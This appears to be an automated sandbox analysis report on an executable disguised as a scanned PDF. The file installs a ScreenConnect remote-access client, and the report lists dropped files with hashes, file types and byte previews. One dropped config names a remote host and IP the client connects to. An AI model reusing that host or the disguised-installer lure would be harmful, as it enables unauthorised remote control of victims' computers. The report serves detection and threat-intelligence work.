                                                                      SSDEEP:196608:L53JLR3LGMLiW35B53JLR3LGMLL53JLR3LGMLU53JLR3LGMLR53JLR3LGMLf53Ju:RTiu7TRT0TLT1TyT
                                                                      MD5:9D1EB5D2194A615E4DC69A7CA7F752CD
                                                                      SHA1:39925BBE52315F21C81FABD7D68DCFCF02709B1F
                                                                      SHA-256:09F76136438F8450DDF58CCDC69B266A05A7DB3B3E29098471C56386390E1C68
                                                                      SHA-512:A7D893DD0984F8F1E4D8C2A7F6BE4706E26CB2E6520A05C6DAF87C16175D35FEB7858078B92BBB767D0EF48F73C610D7AFD0B0249E7A4F180636555D213BD6AA
                                                                      Malicious:false
                                                                      Preview:......................>.......................................................{...n...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98FA6172-4354-E89C-196A-00A1A1714F7D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                      Category:dropped
                                                                      Size (bytes):13496320
                                                                      Entropy (8bit):7.967343879300875
                                                                      Encrypted:false
                                                                      SSDEEP:196608:L53JLR3LGMLiW35B53JLR3LGMLL53JLR3LGMLU53JLR3LGMLR53JLR3LGMLf53Ju:RTiu7TRT0TLT1TyT
                                                                      MD5:9D1EB5D2194A615E4DC69A7CA7F752CD
                                                                      SHA1:39925BBE52315F21C81FABD7D68DCFCF02709B1F
                                                                      SHA-256:09F76136438F8450DDF58CCDC69B266A05A7DB3B3E29098471C56386390E1C68
                                                                      SHA-512:A7D893DD0984F8F1E4D8C2A7F6BE4706E26CB2E6520A05C6DAF87C16175D35FEB7858078B92BBB767D0EF48F73C610D7AFD0B0249E7A4F180636555D213BD6AA
                                                                      Malicious:false
                                                                      Preview:......................>.......................................................{...n...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):440429
                                                                      Entropy (8bit):6.6651462757214
                                                                      Encrypted:false
                                                                      SSDEEP:6144:PuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv6b8l8l8q:PuH2anwohwQUv5uH2anwohwQUvw
                                                                      MD5:C04202E30FFC0AEBD1A76AD96BD2DB67
                                                                      SHA1:554B9055853E107CC0126F1FA86846ADCE0223DD
                                                                      SHA-256:A5F446D8C770419B87D54EE64D484D88455D0901FF5BD520494FD719E82F02EC
                                                                      SHA-512:FB0BEB8B16C5ADD67B09FFC5C91C507D529BE1EDE758B8A3C15ADF1B8915AADD7D6EA1BC9CE981475EC49CE2BC42EF9587D4E71D62C6A8DE495F277DB847345A
                                                                      Malicious:false
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI74E9.tmp, Author: Joe Security
                                                                      Preview:...@IXOS.@.....@..BY.@.....@.....@.....@.....@.....@......&.{98FA6172-4354-E89C-196A-00A1A1714F7D}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{98FA6172-4354-E89C-196A-00A1A1714F7D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):207360
                                                                      Entropy (8bit):6.573348437503042
                                                                      Encrypted:false
                                                                      SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                      MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                      SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                      SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                      SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):207360
                                                                      Entropy (8bit):6.573348437503042
                                                                      Encrypted:false
                                                                      SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                      MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                      SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                      SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                      SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.1615832125061514
                                                                      Encrypted:false
                                                                      SSDEEP:12:JSbX72Fj+iAGiLIlHVRpMh/7777777777777777777777777vDHFMSp3Xl0i8Q:JUiQI5cKI6F
                                                                      MD5:3933A79B38D355A520DA6C9A390025C3
                                                                      SHA1:8254831652777ACEEAE1DC5FDE9AC55A52B40460
                                                                      SHA-256:BED9FA506B99D143367B40D3422FD8ABE43B1F61625044293A9C8271B887D7AC
                                                                      SHA-512:B129F7F70C14EA247986AFF09D78A4C45E32C445605D20C7C1511E116D0443FD3A74BDB803631B8627A6F3C64511BB246CF79BF753E85104169E0ECDDB8E95C7
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.811630902227001
                                                                      Encrypted:false
                                                                      SSDEEP:48:f8PhMuRc06WX4uFT5SLnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrG:ehM1eFTC3mpifCdfqHgcNxya
                                                                      MD5:AED742F82E841AA70D26231052A2E708
                                                                      SHA1:5F9261E7961756CBABA491127956006501C81314
                                                                      SHA-256:EB8BCD7EF6416086F951AA563C6BCA71C4353C31607DBD48D75452132217D580
                                                                      SHA-512:A3EF19F2B471044848F5CD5C423E003B7A97AA0C7DDF2C4CB8BA1C7AB7C74287488A7996B4D7A7EE15A60D451209AE33252170BF1BDF613CA9550AADB1A7DD7D
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:MS Windows icon resource - 3 icons, 16x16, 4 bits/pixel, 32x32, 4 bits/pixel
                                                                      Category:dropped
                                                                      Size (bytes):16968
                                                                      Entropy (8bit):7.91093498836533
                                                                      Encrypted:false
                                                                      SSDEEP:384:trxUYPf4jttLkFh4z+3VCrxUYPf4jttLkFh4z+3VCrxUYPf4jttLkFh4z+3Ve:tV5wttQhLQV5wttQhLQV5wttQhLg
                                                                      MD5:8B946361C69083EE6869CA667DA5534F
                                                                      SHA1:B32B246AAF418127D6132666624236E4731038AB
                                                                      SHA-256:C8DE9FEF9D282ADBC75D5A082BAE43E97B9EBC8A0EF6E3925CF9F5D790CD34CA
                                                                      SHA-512:6BCB946CEC69BD23EAF8874F6B11341F8C2E6D74E036BCC17ADF2945556FDB4D43E93C9BBA99870D35E44B2405C077BCA40E984514A4BFEA43A650A69F78B20F
                                                                      Malicious:false
                                                                      Preview:..................6... ..........<...00..........B,.............. ..........PNG........IHDR..............{`.....IDATx..y.....s.a.`.f%(0*..*....I\...D#...r.<...^..#Q01&..E.K.....j@vA...."....00;3}..qF.>.....[..w....Mwu.W_..`0.....`0...../ ...E........!..\.PBW*..9,a..A_..?.x....J..<.Hr.?Qr.b...o.U.b......3xMwJ[.@S)g...F8.4x.h.m.`aq.R..@..P....|D..*{x.....r..)b.H....,..r..d.Nn.Q,..o..L$/..6.!..J.o*...:.$H..S.@.M"X.(3&.w~...M....Gz.7apJ......>...3O...a.k.XXl.7t..f..L..~....s.y...7j....~..., ..gq@..,J..,...Y..,..jf.+..3H..*........LH....K...H....0.\.?.[KN.t`.g..T..Q...J*.H......d ...+..I.R......s...B..2;5....z2..d.(..`Zg..:.%....r.5I..G(..k..\...a....BdS....".F.o....1..U......8.ilV..h..g.Y-....o....k.S..j..N&.6.JL..oQ.....Ilt-...M..;+.w.E%?..J.B~...%P.....a.E$.[Ts....3.q.PSi.%.........-..6..E*]..-z..q.A4.{!..L.`...."...y.Ot.{%...Lu.2Xnf..!q........#.............. ..]....8D.~...a....x`9'.....~...G<.~..x......B..~.....g.%.6....A.....`.....^6.Me..._.@..u.E..
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):425821
                                                                      Entropy (8bit):5.358686368059442
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau1:zTtbmkExhMJCIpEQxtgQzOzK
                                                                      MD5:B498BEDB463A763C8646C85180F262BA
                                                                      SHA1:15DF6DAF21E769979897083AEFA28ECF78CF7297
                                                                      SHA-256:6BF984AC773446EB494A302E0C34DE9F22635EF162C13BC452A7724FDC5E6716
                                                                      SHA-512:09F4D1A137E85AD664C1797C12D74BE3AB8DB1F3116DEF49B99BC422697A661B8ECD85C856953C5E1A1A7F85C97660D174EF2E50135FF01C8798FAA360FD3504
                                                                      Malicious:false
                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):560
                                                                      Entropy (8bit):5.046718262895174
                                                                      Encrypted:false
                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOFe4wvb/vXbAa3xT:2dL9hK6E46YP/VKvH
                                                                      MD5:92FF5A59AE7EC5CDA90B1FBB96F0019E
                                                                      SHA1:DBA7E08B944AEDA3CDC40C56EA6125DE6F0D7D3C
                                                                      SHA-256:6981E685FE1FDB8FC9915F871D06E35BE83A65DE44AC15E922F7B90D8EDB67AE
                                                                      SHA-512:38B98B5D328D46BF74C7C58D8A3C67CA74D773BCCCD91E1D6D40ED3719A4040C36941D699DB711E67B5F1073A154E2B3A6E71C932E8C1EADD89DEBBC18BAB897
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kkl22.ddns.net=188.119.113.59-02%2f10%2f2024%2004%3a13%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):560
                                                                      Entropy (8bit):5.046718262895174
                                                                      Encrypted:false
                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOFe4wvb/vXbAa3xT:2dL9hK6E46YP/VKvH
                                                                      MD5:92FF5A59AE7EC5CDA90B1FBB96F0019E
                                                                      SHA1:DBA7E08B944AEDA3CDC40C56EA6125DE6F0D7D3C
                                                                      SHA-256:6981E685FE1FDB8FC9915F871D06E35BE83A65DE44AC15E922F7B90D8EDB67AE
                                                                      SHA-512:38B98B5D328D46BF74C7C58D8A3C67CA74D773BCCCD91E1D6D40ED3719A4040C36941D699DB711E67B5F1073A154E2B3A6E71C932E8C1EADD89DEBBC18BAB897
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kkl22.ddns.net=188.119.113.59-02%2f10%2f2024%2004%3a13%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):69632
                                                                      Entropy (8bit):0.23895314205601395
                                                                      Encrypted:false
                                                                      SSDEEP:48:kagRDBAdujS3qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUr7h3TiLn:ka0xpifCdfqHgcNy3
                                                                      MD5:AF02062CAC33381E7E7FA33B00AA2E7B
                                                                      SHA1:CBFA059C4AD899ECF6449CF22956F9E8C9F36E85
                                                                      SHA-256:4307A6621E0320F15559AD38B1E5A68E376D0DB2FBD497B47A6712311552D779
                                                                      SHA-512:35DA2E9478F532E19BBCC70539F6BC25893085EDCDD7D52CD63A567685A60BFAA2149AE012EC2689E91373232CB4A61D6D71814B51A64BCF7BA2399B158B0AB2
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.4293189607798698
                                                                      Encrypted:false
                                                                      SSDEEP:48:7pku8O+xFX4vT5hUILnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrmB:dkZsTXn3mpifCdfqHgcNxya
                                                                      MD5:3255A3353CF44D74BEA85207AE888357
                                                                      SHA1:4D97DE56EC704909593DB2FF1BCF767186C96C64
                                                                      SHA-256:3FB5C8EFF82F5A00FF88B4F047CBD2CDEC65CE07FCF7586271C86500EC122C98
                                                                      SHA-512:EDEE27C701E47BA8470CE2AD2A852F1707FE595EF05E731175EC2E54857ADFED9B2D37C1137CB5BA8F016C4135559E70689CE3EA11F32754C040975BE060A5B5
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.4293189607798698
                                                                      Encrypted:false
                                                                      SSDEEP:48:7pku8O+xFX4vT5hUILnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrmB:dkZsTXn3mpifCdfqHgcNxya
                                                                      MD5:3255A3353CF44D74BEA85207AE888357
                                                                      SHA1:4D97DE56EC704909593DB2FF1BCF767186C96C64
                                                                      SHA-256:3FB5C8EFF82F5A00FF88B4F047CBD2CDEC65CE07FCF7586271C86500EC122C98
                                                                      SHA-512:EDEE27C701E47BA8470CE2AD2A852F1707FE595EF05E731175EC2E54857ADFED9B2D37C1137CB5BA8F016C4135559E70689CE3EA11F32754C040975BE060A5B5
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.06890702944349027
                                                                      Encrypted:false
                                                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOEhHWmyVky6l3X:2F0i8n0itFzDHFMH3X
                                                                      MD5:D3325BB3C713F16071650B2EAE0FD2DC
                                                                      SHA1:9DEBA3F51AB99E3680466E1504364F1B0884968B
                                                                      SHA-256:692F1864A07923EEFF1E1C556BA4632FD99B4215153EDB56A65E84E0DD3B984A
                                                                      SHA-512:AB507B640C423D106D5F19EB272AF35754AFBF77A7BBA9FACA617E08F7FB05CE3FB3CAFC8BF345A355B4E95F18EEDB215C42B7FEF8581B90B90810E89E11DA65
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.811630902227001
                                                                      Encrypted:false
                                                                      SSDEEP:48:f8PhMuRc06WX4uFT5SLnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrG:ehM1eFTC3mpifCdfqHgcNxya
                                                                      MD5:AED742F82E841AA70D26231052A2E708
                                                                      SHA1:5F9261E7961756CBABA491127956006501C81314
                                                                      SHA-256:EB8BCD7EF6416086F951AA563C6BCA71C4353C31607DBD48D75452132217D580
                                                                      SHA-512:A3EF19F2B471044848F5CD5C423E003B7A97AA0C7DDF2C4CB8BA1C7AB7C74287488A7996B4D7A7EE15A60D451209AE33252170BF1BDF613CA9550AADB1A7DD7D
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.4293189607798698
                                                                      Encrypted:false
                                                                      SSDEEP:48:7pku8O+xFX4vT5hUILnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrmB:dkZsTXn3mpifCdfqHgcNxya
                                                                      MD5:3255A3353CF44D74BEA85207AE888357
                                                                      SHA1:4D97DE56EC704909593DB2FF1BCF767186C96C64
                                                                      SHA-256:3FB5C8EFF82F5A00FF88B4F047CBD2CDEC65CE07FCF7586271C86500EC122C98
                                                                      SHA-512:EDEE27C701E47BA8470CE2AD2A852F1707FE595EF05E731175EC2E54857ADFED9B2D37C1137CB5BA8F016C4135559E70689CE3EA11F32754C040975BE060A5B5
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.811630902227001
                                                                      Encrypted:false
                                                                      SSDEEP:48:f8PhMuRc06WX4uFT5SLnt3Tt1qcq56AdujSiS5dLDzV4xMygcuNoXSsllllwkUrG:ehM1eFTC3mpifCdfqHgcNxya
                                                                      MD5:AED742F82E841AA70D26231052A2E708
                                                                      SHA1:5F9261E7961756CBABA491127956006501C81314
                                                                      SHA-256:EB8BCD7EF6416086F951AA563C6BCA71C4353C31607DBD48D75452132217D580
                                                                      SHA-512:A3EF19F2B471044848F5CD5C423E003B7A97AA0C7DDF2C4CB8BA1C7AB7C74287488A7996B4D7A7EE15A60D451209AE33252170BF1BDF613CA9550AADB1A7DD7D
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.433901909719679
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Scan_PDF_5255303072.exe
                                                                      File size:5'685'032 bytes
                                                                      MD5:59a8c372735dafb6e20ad3cf30770d8e
                                                                      SHA1:c9b28e26d40d9d42a7c19c123103f854501a0edb
                                                                      SHA256:a337a28b1413ed787b4e313cfb04ffef6a4730cddc7543b18b6b8656e65111a0
                                                                      SHA512:305d1364882b205bc4837e9d9b51c0af95d7e28d211092afe294fa97fb4a002c27e07bca889a3c2cc2cb33812abc2e1f343984909f4a302a5b94cbd6472ae1c4
                                                                      SSDEEP:49152:zDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:B4s6efPQ53JLbd3LINMLaGUW39f0
                                                                      TLSH:C746F111B3D995B9D0BF063CD87A52699A74BC048722C7AF57D4B92D2D32BC04E323B6
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x4014ad
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
